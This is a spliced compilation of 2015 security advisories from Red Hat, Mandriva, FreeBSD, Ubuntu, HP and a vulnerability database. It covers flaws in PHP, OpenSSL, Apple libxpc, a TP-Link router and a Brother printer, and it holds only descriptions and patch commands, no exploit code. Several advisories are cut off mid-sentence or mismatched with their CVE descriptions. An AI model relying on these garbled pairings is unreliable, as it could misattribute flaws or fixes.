0a629c11ca23ba56d57f61a754def293 mbs2/SRPMS/php-timezonedb-2015.1-1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: php55 security and bug fix update
Advisory ID: RHSA-2015:1053-01
Product: Red Hat Software Collections
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1053.html
Issue date: 2015-06-04
CVE Names: CVE-2014-8142 CVE-2014-9427 CVE-2014-9652
CVE-2014-9705 CVE-2014-9709 CVE-2015-0231
CVE-2015-0232 CVE-2015-0273 CVE-2015-1351
CVE-2015-1352 CVE-2015-2301 CVE-2015-2305
CVE-2015-2348 CVE-2015-2787 CVE-2015-4147
CVE-2015-4148
=====================================================================
1. Summary:
Updated php55 collection packages that fix multiple security issues and
several bugs are now available as part of Red Hat Software Collections 2.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - x86_64
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
PHP is an HTML-embedded scripting language commonly used with the Apache
HTTP Server. The php55 packages provide a recent stable release of PHP with
the PEAR 1.9.4, memcache 3.0.8, and mongo 1.4.5 PECL extensions, and a
number of additional utilities.
The php55 packages have been upgraded to upstream version 5.5.21, which
provides multiple bug fixes over the version shipped in Red Hat Software
Collections 1. (BZ#1057089)
The following security issues were fixed in the php55-php component:
An uninitialized pointer use flaw was found in PHP's Exif extension.
(CVE-2014-9705)
A heap buffer overflow flaw was found in PHP's regular expression
extension. (CVE-2015-2305)
A buffer over-read flaw was found in the GD library used by the PHP gd
extension.
An attacker able to trigger certain error condition in phar archive
processing could possibly use this flaw to disclose certain portions of
server memory. (CVE-2014-9652)
It was found that PHP move_uploaded_file() function did not properly handle
file names with a NULL character. (CVE-2015-2348)
A NULL pointer dereference flaw was found in PHP's pgsql extension. (CVE-2015-1352)
A flaw was found in the way PHP handled malformed source files when running
in CGI mode.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
php55-2.0-1.el6.src.rpm
php55-php-5.5.21-2.el6.src.rpm
x86_64:
php55-2.0-1.el6.x86_64.rpm
php55-php-5.5.21-2.el6.x86_64.rpm
php55-php-bcmath-5.5.21-2.el6.x86_64.rpm
php55-php-cli-5.5.21-2.el6.x86_64.rpm
php55-php-common-5.5.21-2.el6.x86_64.rpm
php55-php-dba-5.5.21-2.el6.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el6.x86_64.rpm
php55-php-devel-5.5.21-2.el6.x86_64.rpm
php55-php-enchant-5.5.21-2.el6.x86_64.rpm
php55-php-fpm-5.5.21-2.el6.x86_64.rpm
php55-php-gd-5.5.21-2.el6.x86_64.rpm
php55-php-gmp-5.5.21-2.el6.x86_64.rpm
php55-php-imap-5.5.21-2.el6.x86_64.rpm
php55-php-intl-5.5.21-2.el6.x86_64.rpm
php55-php-ldap-5.5.21-2.el6.x86_64.rpm
php55-php-mbstring-5.5.21-2.el6.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el6.x86_64.rpm
php55-php-odbc-5.5.21-2.el6.x86_64.rpm
php55-php-opcache-5.5.21-2.el6.x86_64.rpm
php55-php-pdo-5.5.21-2.el6.x86_64.rpm
php55-php-pgsql-5.5.21-2.el6.x86_64.rpm
php55-php-process-5.5.21-2.el6.x86_64.rpm
php55-php-pspell-5.5.21-2.el6.x86_64.rpm
php55-php-recode-5.5.21-2.el6.x86_64.rpm
php55-php-snmp-5.5.21-2.el6.x86_64.rpm
php55-php-soap-5.5.21-2.el6.x86_64.rpm
php55-php-tidy-5.5.21-2.el6.x86_64.rpm
php55-php-xml-5.5.21-2.el6.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el6.x86_64.rpm
php55-runtime-2.0-1.el6.x86_64.rpm
php55-scldevel-2.0-1.el6.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
php55-2.0-1.el7.src.rpm
php55-php-5.5.21-2.el7.src.rpm
x86_64:
php55-2.0-1.el7.x86_64.rpm
php55-php-5.5.21-2.el7.x86_64.rpm
php55-php-bcmath-5.5.21-2.el7.x86_64.rpm
php55-php-cli-5.5.21-2.el7.x86_64.rpm
php55-php-common-5.5.21-2.el7.x86_64.rpm
php55-php-dba-5.5.21-2.el7.x86_64.rpm
php55-php-debuginfo-5.5.21-2.el7.x86_64.rpm
php55-php-devel-5.5.21-2.el7.x86_64.rpm
php55-php-enchant-5.5.21-2.el7.x86_64.rpm
php55-php-fpm-5.5.21-2.el7.x86_64.rpm
php55-php-gd-5.5.21-2.el7.x86_64.rpm
php55-php-gmp-5.5.21-2.el7.x86_64.rpm
php55-php-intl-5.5.21-2.el7.x86_64.rpm
php55-php-ldap-5.5.21-2.el7.x86_64.rpm
php55-php-mbstring-5.5.21-2.el7.x86_64.rpm
php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm
php55-php-odbc-5.5.21-2.el7.x86_64.rpm
php55-php-opcache-5.5.21-2.el7.x86_64.rpm
php55-php-pdo-5.5.21-2.el7.x86_64.rpm
php55-php-pgsql-5.5.21-2.el7.x86_64.rpm
php55-php-process-5.5.21-2.el7.x86_64.rpm
php55-php-pspell-5.5.21-2.el7.x86_64.rpm
php55-php-recode-5.5.21-2.el7.x86_64.rpm
php55-php-snmp-5.5.21-2.el7.x86_64.rpm
php55-php-soap-5.5.21-2.el7.x86_64.rpm
php55-php-xml-5.5.21-2.el7.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm
php55-runtime-2.0-1.el7.x86_64.rpm
php55-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-1352
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBWDXlSAg2UNWIIRAnzoAJ9qn4wDNXMD8JU1N7k7nEzKlPpGDwCgi0Si
MD3ZncY/P8Pl6+DgQxJQCjo=
=MxfY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201501-0272 | CVE-2014-8835 | Apple OS X of libxpc of xpc_data_get_bytes Vulnerability in arbitrary code execution in function |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. http://cwe.mitre.org/data/definitions/19.htmlBy the attacker, sysmond By providing a crafted dictionary, arbitrary code could be executed. Apple Mac OS X is prone to multiple security vulnerabilities.
The update addresses new vulnerabilities that affect Bluetooth, CPU Software, CommerceKit Framework, CoreGraphics, CoreSymbolication, Intel Graphics Driver, IOHIDFamily, IOUSBFamily, Kernel, LaunchServices, LoginWindow, Sandbox, SceneKit, security, security_taskgate, Spotlight, SpotlightIndex, sysmond, and UserAccountUpdater components.
Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, disclose sensitive information and perform other attacks. Failed attacks may cause denial-of-service conditions.
These issues affect OS X prior to 10.10.2
| VAR-201501-0384 | CVE-2014-3019 | IBM BladeCenter SAS Connectivity Module and SAS RAID Module Vulnerable to access to blades and storage pools |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
IBM BladeCenter SAS Connectivity Module (aka NSSM) and SAS RAID Module (aka RSSM) before 1.3.3.006 allow remote attackers to obtain blade and storage-pool access via a TELNET session.
An attacker can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks. A security vulnerability exists in IBM BladeCenter NSSM and RSSM 1.3.3.004 and earlier versions
| VAR-201501-0136 | CVE-2015-1056 | Brother MFC-J4410DW Cross-site scripting vulnerability in printer firmware |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Brother MFC-J4410DW printer with firmware before L allows remote attackers to inject arbitrary web script or HTML via the url parameter to general/status.html and possibly other pages. The Brother MFC-J4410DW is a color laser printer device that supports wireless network printing. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of a browser that is not known to the affected user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Brother MFC-J4410DW is a printer product of Japan Brother Industries (Brother). The vulnerability is caused by the general/status.html file not adequately filtering the 'url' parameter
| VAR-201501-0652 | CVE-2014-9510 |
TP-Link TL-WR840N Cross-site request forgery vulnerability in router firmware
Related entries in the VARIoT exploits database: VAR-E-201501-0445 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in the administration console in TP-Link TL-WR840N (V1) router with firmware before 3.13.27 build 141120 allows remote attackers to hijack the authentication of administrators for requests that change router settings via a configuration file import. The TP-Link TL-WR840N is a wireless router device. An attacker could exploit this vulnerability to perform certain unauthorized actions. Other attacks are also possible.
TP-Link TL-WR840N Router running firmware 3.13.27 Build 140714 and prior are vulnerable. Classification: //Dell SecureWorks/Confidential - Limited External
Distribution:
############################################################################
# * Title: TP-Link TL-WR840N Configuration Import Cross-Site Request Forgery
(CSRF)
# * Advisory ID: SWRX-2015-001
# * Advisory URL:
http://www.secureworks.com/cyber-threat-intelligence/advisories/SWRX-2015-00
1/
# * Date published: Wednesday, January 7, 2015
# * CVE: CVE-2014-9510
# * CVSS v2 base score: 9.3
# * Date of last update: Wednesday, January 7, 2015
# * Vendors contacted: TP-Link
# * Release mode: Coordinated
# * Discovered by: Sean Wright, Dell SecureWorks
############################################################################
Summary:
TP-Link is a primary provider of networking equipment and wireless products
for small and home offices as well as for small to midsized businesses.
TL-WR840N is a combination wired/wireless router specifically targeted to
small business and home office networking environments. An attack could alter any configuration setting on the device.
----------------------------------------------------------------------------
Vendor information, solutions, and workarounds:
TL-WR840N users should upgrade the router's firmware to 3.13.27, build
141120 or later.
----------------------------------------------------------------------------
Details:
The TP-Link TL-WR840N router provides a web administration console that
enables the device owner to
change the router's configuration. The administration console includes an
option to import an existing
configuration from a binary file, but this feature is vulnerable to CSRF
attacks. A threat actor could use
social engineering to trick a victim into visiting a malicious web page that
exploits the CSRF vulnerability
and imports a malicious configuration file via the router's web
administration console. The attacker
could change any settings on the router, including the firewall settings and
the router's remote
administration capabilities. If the device owner has not changed the default
username and password,
then the attack would not require the victim to log into the router's web
administration console.
----------------------------------------------------------------------------
| VAR-201501-0340 | CVE-2015-0206 | OpenSSL ‘ dtls1_buffer_record ‘Function buffer error vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection. OpenSSL is prone to denial-of-service vulnerability.
An attacker may exploit this issue to cause the memory exhaustion, resulting in denial-of-service conditions. The Common Vulnerabilities and Exposures project
identifies the following issues:
CVE-2014-3569
Frank Schmirler reported that the ssl23_get_client_hello function in
OpenSSL does not properly handle attempts to use unsupported
protocols.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc. This
allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks
and trigger a loss of forward secrecy.
CVE-2014-8275
Antti Karjalainen and Tuomo Untinen of the Codenomicon CROSS project
and Konrad Kraszewski of Google reported various certificate
fingerprint issues, which allow remote attackers to defeat a
fingerprint-based certificate-blacklist protection mechanism.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>. Background
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-3569] This does not affect
FreeBSD's default build. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. [CVE-2014-3570]
III. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of
the session. This only
affects servers which trust a client certificate authority which issues
certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of
the signature, it is possible to change the certificate's fingerprint. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII.
Softpaq:
http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-
4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-
4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch
applied, VMware cannot connect if security level is set to "Refuse insecure
connections". Updating VMware to the latest package on ftp.hp.com will solve
the problem. ============================================================================
Ubuntu Security Notice USN-2459-1
January 12, 2015
openssl vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2014-3571)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled certain
handshakes. (CVE-2014-3572)
Antti Karjalainen, Tuomo Untinen and Konrad Kraszewski discovered that
OpenSSL incorrectly handled certain certificate fingerprints. (CVE-2015-0204)
Karthikeyan Bhargavan discovered that OpenSSL incorrectly handled client
authentication.
This issue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. This issue
only affected Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 14.10.
(CVE-2015-0206)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.10:
libssl1.0.0 1.0.1f-1ubuntu9.1
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.8
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.21
Ubuntu 10.04 LTS:
libssl0.9.8 0.9.8k-7ubuntu8.23
After a standard system update you need to reboot your computer to make
all the necessary changes. This could lead to a Denial
Of Service attack (CVE-2014-3571).
The updated packages have been upgraded to the 1.0.0p version where
these security flaws has been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
https://www.openssl.org/news/secadv_20150108.txt
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 1/X86_64:
08baba1b5ee61bdd0bfbcf81d465f154 mbs1/x86_64/lib64openssl1.0.0-1.0.0p-1.mbs1.x86_64.rpm
51198a2b577e182d10ad72d28b67288e mbs1/x86_64/lib64openssl-devel-1.0.0p-1.mbs1.x86_64.rpm
aa34fd335001d83bc71810d6c0b14e85 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0p-1.mbs1.x86_64.rpm
c8b6fdaba18364b315e78761a5aa0c1c mbs1/x86_64/lib64openssl-static-devel-1.0.0p-1.mbs1.x86_64.rpm
fc67f3da9fcd1077128845ce85be93e2 mbs1/x86_64/openssl-1.0.0p-1.mbs1.x86_64.rpm
ab8f672de2bf2f0f412034f89624aa32 mbs1/SRPMS/openssl-1.0.0p-1.mbs1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFUr+PRmqjQ0CJFipgRAtFXAJ46+q0aetnJkb6I9RuYmX5xFeGx9wCgt1rb
LHbCdAkBpYHYSuaUwpiAu1w=
=ePa9
-----END PGP SIGNATURE-----
.
Release Date: 2015-08-24
Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized
access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Matrix
Operating Environment. The vulnerabilities could be exploited remotely
resulting in unauthorized modification, unauthorized access, or unauthorized
disclosure of information.
References:
CVE-2010-5107
CVE-2013-0248
CVE-2014-0118
CVE-2014-0226
CVE-2014-0231
CVE-2014-1692
CVE-2014-3523
CVE-2014-3569
CVE-2014-3570
CVE-2014-3571
CVE-2014-3572
CVE-2014-8142
CVE-2014-8275
CVE-2014-9427
CVE-2014-9652
CVE-2014-9653
CVE-2014-9705
CVE-2015-0204
CVE-2015-0205
CVE-2015-0206
CVE-2015-0207
CVE-2015-0208
CVE-2015-0209
CVE-2015-0231
CVE-2015-0232
CVE-2015-0273
CVE-2015-0285
CVE-2015-0286
CVE-2015-0287
CVE-2015-0288
CVE-2015-0289
CVE-2015-0290
CVE-2015-0291
CVE-2015-0292
CVE-2015-0293
CVE-2015-1787
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
CVE-2015-2134
CVE-2015-2139
CVE-2015-2140
CVE-2015-2301
CVE-2015-2331
CVE-2015-2348
CVE-2015-2787
CVE-2015-3113
CVE-2015-5122
CVE-2015-5123
CVE-2015-5402
CVE-2015-5403
CVE-2015-5404
CVE-2015-5405
CVE-2015-5427
CVE-2015-5428
CVE-2015-5429
CVE-2015-5430
CVE-2015-5431
CVE-2015-5432
CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
